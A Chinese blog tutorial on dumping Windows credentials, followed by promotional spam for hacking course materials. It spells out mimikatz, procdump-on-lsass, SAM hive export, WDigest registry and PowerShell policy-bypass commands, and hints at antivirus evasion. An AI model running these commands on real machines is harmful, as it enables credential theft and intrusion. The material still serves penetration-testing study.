windows获取hash常见手法

最新推荐文章于 2024-03-22 16:16:48 发布
最新推荐文章于 2024-03-22 16:16:48 发布
阅读量1k 收藏 20
点赞数 21
分类专栏: 网络安全 计算机 程序员 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Python_0011/article/details/135522574
版权
程序员 同时被 3 个专栏收录
524 篇文章 85 订阅
订阅专栏
计算机
453 篇文章 9 订阅
订阅专栏
网络安全
401 篇文章 26 订阅
订阅专栏

有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!

一 猕猴桃mimikatz

实验环境 win7

适用于Windows 8.1 和 Windows Server 2012 R2 之前

privilege::debug  
  
sekurlsa::logonpasswords

实验环境 win10

Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储

可以读到hash

所有我们要修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

将 UseLogonCredential 设置为 1 然后重启

Shutdown -r -t 0

再用猕猴桃就可以获取到密码了

privilege::debug``   ``sekurlsa::logonpasswords

或者 管理员打开cmd运行procdump导出dmp

https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

多说一句,lsass.exe这个Windows系统进程,它负责处理与安全策略和登录身份验证相关的任务,功能有用户登录认证,创建访问令牌。下面这条命令的执行结果是创建一个lsass.exe 进程的完整内存转储文件(12.dmp)。

procdump64.exe -accepteula -ma lsass.exe 12.dmp

然后放到猕猴桃的目录

sekurlsa::minidump 12.dmp  
sekurlsa::logonpasswords full

二 注册表获取sam文件

从注册表导出

reg save hklm\sam e:\sam.hive``reg save hklm\system e:\system.hive

其中hklm 代表 “HKEY_LOCAL_MACHINE”,这是注册表的一个主分支。SAM 是其下的一个子分支,存储了与系统安全账户管理相关的信息,如用户账户和密码哈希。

把这两个hive放到猕猴桃目录

lsadump::sam /sam:sam.hive /system:system.hive

实战中,猕猴桃会被杀或者是不允许上传mimikatz,可以把这两个文件拖到自己的机器上读取,如下图我拖本机的密码到虚拟机里一样可以读取。

希望各位读者看完我们的文章以后自己去实践一下,只有学到脑子里的东西才是自己的,如果遇到困难,可以私信加本人微信,与麋鹿师傅一起探讨,炼心之路,就在脚下,我们一起成长。

三 powershell

用原版肯定被杀,有能力的可以做一下免杀

https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1``powershell -exec bypass "import-module .\Get-PassHashes.ps1;Get-PassHashes"

有师傅说,开赞赏可以增加浏览量,故麋鹿开了该功能,如果您喜欢我们的文章,想让更多的人看到我们的公众号,或者给我们一点小小的鼓励,请您点个赞和再看就行了,如果手头宽裕,打赏一分钱就好啦,谢谢您的喜欢!

`黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

程序员_大白
关注
  • 21
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Windows系统API计算数据和文件的MD5哈希值,支持大文件
Fyter's BLog
03-09 3815
// 计算数据的MD5字符串 string ComputeMD5(const char* szData, size_t len) // 计算文件的MD5字符串,支持大文件(large file) string ComputeFileMD5(const TCHAR* szFilename)
John the Ripper 获取hash
10-06
John the Ripper 获取hash
Hash.reg 快捷计算哈希值 #资源达人分享计划#
08-05
这是一个快捷计算哈希值等其他值的注册表文件,注册完成后,直接用鼠标右键文件就找到 HashTest 就可以进行计算哈希值,可计算MCTripleDES,MD5,RIPEMD160,SHA1,SHA256,SHA384,SHA512的值,方便好用快捷(我个人是这么认为的)
HASH获取
qq_23685227的博客
08-30 205
命令行输入:C:\Users\Administrator>certutil -hashfile SIC-1000.exe md5。
Java基础15 hash值 set map
Xs943的博客
02-02 1451
例子:生成随机数,不能重复,存入List集合并进行升序输出 public class Test02 { public static void main(String[] args) { List li = new ArrayList(); while (li.size()<10){ //产生一个1-100随机数 int random= (int) ((Math.random()*100)+1); //判断集合中是否包含这个元素 if (!li.contains(random)){ li.add(ran
winAPI做hash加密
wangxijie的专栏
09-04 960
#include #include using namespace std;#include #include #include #include #include #include #define BOLCKSIZE 184320DWORD ComputeHash(CONST BYTE *pbData, DWORD dwDataLen, ALG_ID al
javascript实现获取字符串hash
10-24
Hash 可以看作是一个 关联数组,它对每一个值都绑定了一个唯一的键(值并不必须是唯一的), 然而,它不能保证迭代时元素的顺序始终一致。因为 JavaScript 程序语言的特性,每个对象实际上都是一个 hash,下面我们...
hashcat for windows
12-01
Versions are available for Linux, OS X, and Windows and can come in CPU-based or GPU-based variants. Examples of hashcat-supported hashing algorithms are Microsoft LM hashes, MD4, MD5, SHA-family, ...
获取win10的hash
01-08
powershell路劲:C:\Windows\System32\WindowsPowerShell\v1.0 记住powershell要以管理员运行 win10密码文件:C:\Windows\System32\config\SAM powershell上输入 get-filehash d:\module.txt -algorithm md5 也可以...
PowerShell小技巧之获取Windows系统密码Hash
01-09
当你拿到了系统控制权之后如何才能更长的时间内控制已经拿到这台机器呢?作为白帽子,已经在对手防线上撕开一个口子,如果你需要进一步扩大战果,你首先需要做的就是潜伏下来,收集更多的信息便于你判断,便于有更大...
横向移动之windows登录账号密码导出
good good study
02-16 2825
在默认情况下,当系统为win10或2012R2及以上时,默认在内存缓存中禁止保存明文密码,所以无法在 lsass.exe 进程中抓取明文密码。此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
获取windows hash的几种方式
lansefly1990的专栏
02-26 6558
一、windows hash介绍 NTML hash是指在windows系统下的Security Account Manager中保存的用户密码hashhash的生成方法: 将明文口令转换成十六进制的格式; 转换成Unicode格式,即在每个字节之后添加0x00; 对Unicode字符串作MD4加密,生成32位的十六进制数字串; 如测试测试密码为haha123 转成十六进制为:...
win10如何校验文件哈希值
xiaoxianerqq的专栏
04-23 7328
转自:https://jingyan.baidu.com/article/67662997a9b06654d51b84a1.html 文件的哈希值可以用软件计算(算法一样),无须多讲。 本文讲述如何用win10自带命令计算 ——————————————————————— 右击开始 点击windows powershall(管理员) 右击想要校验哈希值的文...
java里的哈希值
qq_45196580的博客
05-26 1507
而默认的hashcode方法返回的是对象zhi的内存地址转换成的一个整数,实际上指的的也是内存,两个方法可以理解为比较的都是内存地址,这在实际开发的过程中在hashmap或者hashset里如果不重写的hashcode和equals方法的话会导致我们存对象的时候,把对象存进去了,取的时候却取不到想要的对象,这时候就需要重写这两个方法了。2:String类的hashCode.根据String类包含的字符串的内容,根据一种特殊算法返回哈希码,只要字符串内容相同,返回的哈希码也相同。
windows获取hash常见手法,你知道吗?
最新发布
logic1001的博客
03-22 1354
有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!适用于Windows 8.1 和 Windows Server 2012 R2 之前Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储可以读到hash所有我们要修改注册表将 UseLogonCredential 设置为 1 然后重启再用猕猴桃就可以获取到密码了。
获取hash
新知的博客
06-16 1302
获取hash值 code from hashlib import md5 from hashlib import sha1 from hashlib import sha224 from hashlib import sha384 from hashlib import sha512 import hashlib def hashForString(method,srcbyte): srcbyte = srcbyte.encode('gb2312') testnew = hashlib.n
导出系统注册表抓Hash的思路整理
fengling132的专栏
05-02 3080
首先使用 administrator权限登录,然后使用 reg来保存注册表中 HKLM下的 SECURITY,SAM,SYSTEM,注意这里必须使用 reg的 save选项,export选项是不行的, reg save hklm\sam sam.hive  reg save hklm\system ystem.hive  reg save hklm\security security.hiv
获取哈希值
weixin_51664099的博客
09-03 380
【代码】获取哈希值。
Windows、Linux 系统下查看文件hash、md5、sha
qq_25775675的博客
07-16 1917
Windows、Linux系统下查看文件hash、md5、sha。
windows怎么获取hash
05-24
Windows 操作系统中,可以通过 PowerShell 命令来获取文件的哈希值。请按照以下步骤操作: 1. 打开 PowerShell 命令行界面,可以通过在开始菜单中搜索“PowerShell”来找到它。 2. 在 PowerShell 命令行中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值